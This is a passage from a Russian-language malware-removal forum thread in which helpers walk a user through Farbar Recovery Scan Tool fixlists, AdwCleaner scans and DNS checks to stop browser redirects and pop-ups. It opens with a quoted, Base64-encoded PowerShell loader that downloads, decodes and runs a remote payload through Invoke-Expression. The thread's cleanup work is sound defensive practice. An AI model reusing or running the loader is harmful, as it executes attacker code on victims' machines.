IAdABBAFMAUgBMAGwAbQBUAG4AWABYAEwATQB0AG8AcABNAGEASwAyAHYAYgAyAGcAVgBXADkAZQBNADMATQByAHAAUwBmAGUAOABkAFgAcABsAGYAMwBCAHgAdgBIAGgAYwBpAFQAcgBUAGYAUwBNAFQAOAAyADcARwBQAFYAaABCAGEAbQBhAEkANwBRAFgASgB6ADcAegBkAGwAVwBKAGwAMQBoAE4AYgBUAEEAVgByAFQAUABNAGkAQQBfADMANQAwADAAaQBhAFUAWABnAEYATQBOAHMAQQA1AE0AdQBrADgAdABRADQATwBJADQAXwBtAEoAcQBGAFkAYQA0AGkAcwBmAGgAdABjADEAWgBkAE4AVQB4AGIAUgBhAFQAUwA2AEIAMgBmAEUAQwBsAGcAVwA0AGMAeABGADMAbQA0AE4ASQBNAFQAeQB6AGYAZAA5ADgAdABTAE4AUABmAHIAYwBuAGYAeQBtADYAbwBGAFQAcgBMAFEAOABJAG8ALQBCAEkAcQBtAHYARQByAFMAUgBTAHEASABmAGMAcgBxADAAYgBLAHQAQgBnAE4AbABiAHgAcgBqAEgAWQB3AFUAbgBXAGEANQBZADMAZwAwADgAbwBiADQAMwAxAG0ANAA0AHgAZwBDAFcAcgBlAGwAYgBoAHMAQgBhAEQAZABiAFQASgBWAGMAVAB3AC0AUQAtAEsARQBYAFkAOQBGADYAMgByAFQAQwBqAFoAZAAzAFIAcgBTAC0AWAA4AEkAdgB3ADgASgBJAFgATQA3AFoATQBjAEsASgBkAGIAWQAzAFEAOABlAHIAMQA5AGsAUgBsAGcAQQBTAHAAaQBYAGcAMwBpAEgATgA4AGUAUABCAC0AawBlAC0ARAAzAHkANAB6AFkANAA0AEYANQB6AEsAdAA2AFgAdwAtAEsARwBCAC0ATAB4AGIAZwB1AF8AeABfAFgAZgBqAGQANwBOADMAUQBoAEcANQB0AE4AWQBEAGQARABCADYAagA4AGUASgBIAHoARQA5ADkAOQBsAFIAawBwAGwAdQB5AF8AOQAtAFUAawBGADAAdwAtAGMATwB4AGoAZABlAHgAbgBmAGwAeAByAEYAYgAyAGIATgBRAEQAMgBHAHkATwBtAEMAYgBkAGYAawA4AFkASwBmAGIAMgBJAGsAYgA1AHIAMgBzAEIAYQBJADAAcgBsAGMAUQBfAFEAagBMAGYAQgA2ADYAdABQAEgAUgBQAE0AUwBaAHAALQBVACYAYwA9AEUAVgA3AEcARgBRAEEAMAA3AG8ARgA3ADcAWQBlAE8AVwA0AGYATQBpAHEAUgA4AFUAWAA1ADUAMQBfAFoAeAAwAFEAaABEAHUAdQB4AFMAZwBVADQAUABXAEcAQwBKAHgAUgBiAE4ATQB1ADcAbAB5AEIAdwBxAGoAZwBMAF8AQwB4ADkASABlAEUAQgB6AFYAWQBEADQAVQBOAFIAUQBTAFkAUABBAG4ANQBxAFcAbwB6AGcAWgBVAGkALQBDAEcAeQBSAFUAUQBRAG0AZwBvAFUAYQBaAE4AagBwADgAZQB3AFoAZABKAHkAaABzADYAdQBGAFcATwBNAFUAWgBDADQAdQBfAFIAQwA3AFIAUQBUAGwANgBxADAATgAyAEsARAAzAHYAXwBnAFYARQB0AHEATwB1AFAAVwBMAFEAWgBrAHQATQBLAFEAQgBNAFIATgBlAGEAaQB4AEwAUQA1AE4AQQBrAG4AeQBwAEgANwBOAHQAUQBBAEIAaAAtADcAcABFAHUARgBEAHUAdQB5AHEASABJADUARABDADEAUgBFAGsAVwBZAEwANQBTAGsAZgBKAFkANAB1AF8ASwBEAFkAZwBYAG0ARgB1AGgAaQBXAHQAQQBzAFgAQwA3AGIAaQBHAGEAcABBADkATgBaAEwAWgBCAEYAYwBkAEwAZgBjAGYANgBwAHcATQBrAFkAbQA1AFMAdgBiAFEAYgB5AEoAVgBWADUAYgBPAFgASQBqAFIAcgBNAFoAYwAwAFAATgA1AE8AaQBCAGMAMQA5AHgARwBfAG4AMwBKADcATQBPAHoAUgBWADkAdAA3AEMAWAA2AEYAbAB4AEEAZgAzAFUAQQA2AEwAMABfAHAAQgBFADUAawBGAFIASQBkAEYAbgBjAEIANABBAE4AZgB6AHMAYwBKADAASQBRAEwAdQBoAE4AcwBGAHgAeQBSADAAWQBQAGQAVABXAEYAZQBHADgAdAAzAGMAcwAtAG8AQgB6AFcAWQBwAE8ASgBJAEIAOABTAFkAVwBoAEoAaABIAEsAZgBaADYARwBNAEMAcgBqAEIASQBRAFoAZQBhAFoAawB5ADQAQgA4AGoASgBPAFgAMABtAEIASABUAHgAZwBfADEAWQByAHIAMAA3AGwAUwBPADkAOQBJAFYAUwA4AHMATAB4AGkAWAB0ADkAcgB6AHQAUgBwAG4AQgBEAGsASgB4AGIAcQB5AEEAOQBMAF8AdgBmAEIAbwBUADYASQBrAGcAQgBiAFkAVwBlAFYAMQBZAHMAcwB5AFYASQAtAF8ASgBYAHkAYwBmAEsAcQBIAEMAdgBjADEALQBlAFAAbABVAFUAaQBaAGsAbABnAE8AWQBxADUATwAzADkAdABMAF8AeQBtAEYAUQBuAHIAaABKAEQAQwBnAEIAbgBIAFgAVABKAFoAcQAzAHkAbQA2AEQAaQBsAEEANAAtADUAbABvAEQAVQBqAGEAMQBYAHcATgBvAG4ARAB4AGoAUQB4AHMAOQA4AHgAQQBnAE4AegAtAFQAWQBfAFEAeQBWAGYARAB6AHUAeAAtAGsAZQBKAEoAbwBaAGMASAB4AFcAUwBaADMAeABBAGEAOABOADUATQAyAFIAXwBwADYAUgB4AHQASABIAFgAYQBJAG4AagAwADcAMgBoAFoAagBfAE0AdgBsAHoAMgBoAF8AUABfAHQAdwB6AGcAUwBfAGQAOABUAFMAUgBSAE4AOABpAEYATwBwAHoATgA3AFoAQgAtAHUARQBoAEUAUwBQAFIASABaAE4AWABfAHQARABuAFcAagBIAHMAWQBCADMAbwBEAGkASgBhACYAcgA9ADMAMgAwADIAMgAzADMANgA1ADQAMwAxADcANwA0ADQAMgA3ADYAIgA7ACQAcwB0AHMAawA9ACIAewBBAEMAMwBGADkAMwBFADAALQBDADEANQBEAC0AQgBCADcAMgAtAEIAOQA0AEYALQA5AEEANgA3ADUANgBFAEUANgA0AEMAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAEQAVAAiADsAJABpAG4AaQBkAD0AIgAwACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsACgB9ADsAfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7ADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAFEATwBVAFAATQBNAFMATABEAEMAQgAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAE0AWQBUAEMAVQBIAEEAUQBZAFcAVQBPAFQAUQBDACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AAoAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA7AH0ACgAkAHMAYwA9AE0AWQBUAEMAVQBIAEEAUQBZAFcAVQBPAFQAUQBDACgAUQBPAFUAUABNAE0AUwBMAEQAQwBCACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAIAB9ADsAZQB4AGkAdAAgADAAOwA=
Reboot:
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]

Выполнено. Но редирект все равно происходит. Причем с этого сайта.

приложите новый лог FRST.

Выполнено. Ксати, Speed Dial оказался нужным расширением :)

[QUOTE=Molotoff;1360236]Выполнено. Ксати, Speed Dial оказался нужным расширением :)[/QUOTE]
Сможете установить его заново?

Знакомы расширения в Firefox?

[CODE]
FF Extension: ImTranslator - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\extensions\{9AA46F4F-4DC7-4c06-97AF-5035170634FE}.xpi [2016-01-22]
FF Extension: Turn Off the Lights - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\extensions\[email protected] [2016-02-12]
FF Extension: ZenMate Security, Privacy & Unblock VPN - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\Extensions\[email protected] [2016-02-17]
FF Extension: Wappalyzer - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\Extensions\[email protected] [2016-02-06]
[/CODE]

[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
SearchScopes: HKU\S-1-5-21-396966855-316378592-212668334-1000 -> {04D4ED4A-CE75-4FA7-95FE-30FAB552CA14} URL = hxxp://search.yahoo.com/search?p={searchTerms}&fr=tightropetb&type=11467
CHR Extension: (No Name) - C:\Users\IlyinBoris\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdefnbcpjeflgggkipfemfckjicceiii [2016-02-20]
CHR Extension: (Платежная система Интернет-магазина Chrome) - C:\Users\IlyinBoris\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-02-20]
Folder: C:\ProgramData\KMSAutoS
Folder: C:\Users\IlyinBoris\AppData\Roaming\HAL
Reboot:
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]

Выполнено. По поводу расширений - они все мои, ставил давно.

Приложите лог утилиты FRST, но только отметьте "Shortcut.txt".

Готово.

[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
CHR Extension: (No Name) - C:\Users\IlyinBoris\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdefnbcpjeflgggkipfemfckjicceiii [2016-02-21]
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]

Уточните подробнее, как воспроизводятся "Но редирект все равно происходит."

Готово. Вопрос в том, что на этом сайте и на других, даже если ничего не делаешь - перекидывает на другие сайты и всплывает по нескольку окон.

Чтобы написать это сообщение, приходится долго и упорно все закрывать и останавливать.

Подготовьте новый лог [URL="http://virusinfo.info/showthread.php?t=146192&p=1041844&viewfull=1#post1041844"]AdwCleaner[/URL] и приложите его в теме.

Скачайте программу [url="https://yadi.sk/d/6A65LkI1WEuqC"]Universal Virus Sniffer[/url] и [url="http://virusinfo.info/showthread.php?t=121767"]сделайте полный образ автозапуска uVS[/url].

Готово.

[url=http://virusinfo.info/showthread.php?t=146192&p=1041864&viewfull=1#post1041864]Удалите в AdwCleaner[/url] всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.

[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
Tcpip\..\Interfaces\{B07EFB45-F293-483D-9BAC-B591C3FE08D3}: [DhcpNameServer] 82.163.143.171
Reboot:
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]

Очистите куки, кэш браузеров и кэш DNS ([URL="http://virusinfo.info/showthread.php?t=128635"]http://virusinfo.info/showthread.php?t=128635[/URL])

Готово

Что с проблемой?

Пока все также :(

[QUOTE=Molotoff;1361178]Пока все также :([/QUOTE]
Все также появляюьтся рекламные сайты?
В каких браузерах воспроизводиться?

Да, происходит редирект и всплывают pop up окна.

Пользуюсь Firfox'ом в основном. Остальными реже.

Приложите новый лог FRST, также уточните этот ip-адрес "192.168.1.1" - роутера?

Выполнено. Да это ip-адрес роутера.

[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
Folder: C:\Users\IlyinBoris\AppData\Roaming\Telegram Desktop
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![/LIST]

Проверьте настройки у роутера, возможно нужно перенастроить роутер и сменить пароль.

Выполнено с FRST.

Предлагаете поменять пароль на сам роутер?

По пути сделал лог AdwCleaner'ом, наметилась удивительная вещь - там появляется файл в отчете, если его удалить этой же утилитой, то при перезагрузке он при сканировании появляется вновь.

Уточните пожалуйста, если переименовать каталог профиля браузера Chrome с
[CODE]C:\Users\IlyinBoris\AppData\Local\Google\Chrome\User Data\Default [/CODE]
на
[CODE] C:\Users\IlyinBoris\AppData\Local\Google\Chrome\User Data\Default.bak[/CODE].

Предварительно закрыв google chrome, проблема воспроизводиться после следующего открытия chrome?

в хроме вроде все нормально, а вот Firefox, которым активно пользуюсь, продолжает выкидывать "фокусы"

[QUOTE=Molotoff;1361448]в хроме вроде все нормально, а вот Firefox, которым активно пользуюсь, продолжает выкидывать "фокусы"[/QUOTE]

Какие из следующих расширений на Firefox Вам знакомы и пользуетесь?
[CODE]FF Extension: Adblock Plus Pop-up Addon - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\extensions\[email protected] [2015-05-29]
FF Extension: 1C:Enterprise Extension - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\extensions\[email protected] [2015-08-17] [not signed]
FF Extension: ImTranslator - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\extensions\{9AA46F4F-4DC7-4c06-97AF-5035170634FE}.xpi [2016-01-22]
FF Extension: Turn Off the Lights - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\extensions\[email protected] [2016-02-12]
FF Extension: Speed Dial [FVD] - New Tab Page, Sync... - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\extensions\[email protected] [2016-02-21]
FF Extension: ZenMate Security, Privacy & Unblock VPN - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\Extensions\[email protected] [2016-02-17]
FF Extension: Wappalyzer - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\Extensions\[email protected] [2016-02-06]
FF Extension: Adblock Plus - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-02-24]
[/CODE]

Ну вроде все мои.

Приложите лог [B]Shortcut.txt[/B] утилиты [B]FRST[/B] (только отметьте "[B]Shortcut.txt[/B]").

Покажите результат следующей команды в командной строке(cmd.exe):
[CODE]nslookup[/CODE]


[QUOTE=Molotoff;1361422]
Предлагаете поменять пароль на сам роутер?
[/QUOTE]

Для начало, необходимо убедитесь, чтобы не были прописаны ДНС-сервера вида 82.163.143.171 на роутере.

Результат работы FRST и команды nslookup.

Залез в настройки роутера - все чисто, вообще никаких DNS не прописано.

А если в целях тестирования переименовать каталог профиля Firefox с
[CODE]C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default[/CODE]
на
[CODE]C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default.bak[/CODE]
Предварительно закрыв Firefox, проблема воспроизводиться?

При таком переименовании Firefox не запускается - ошибка загрузки профиля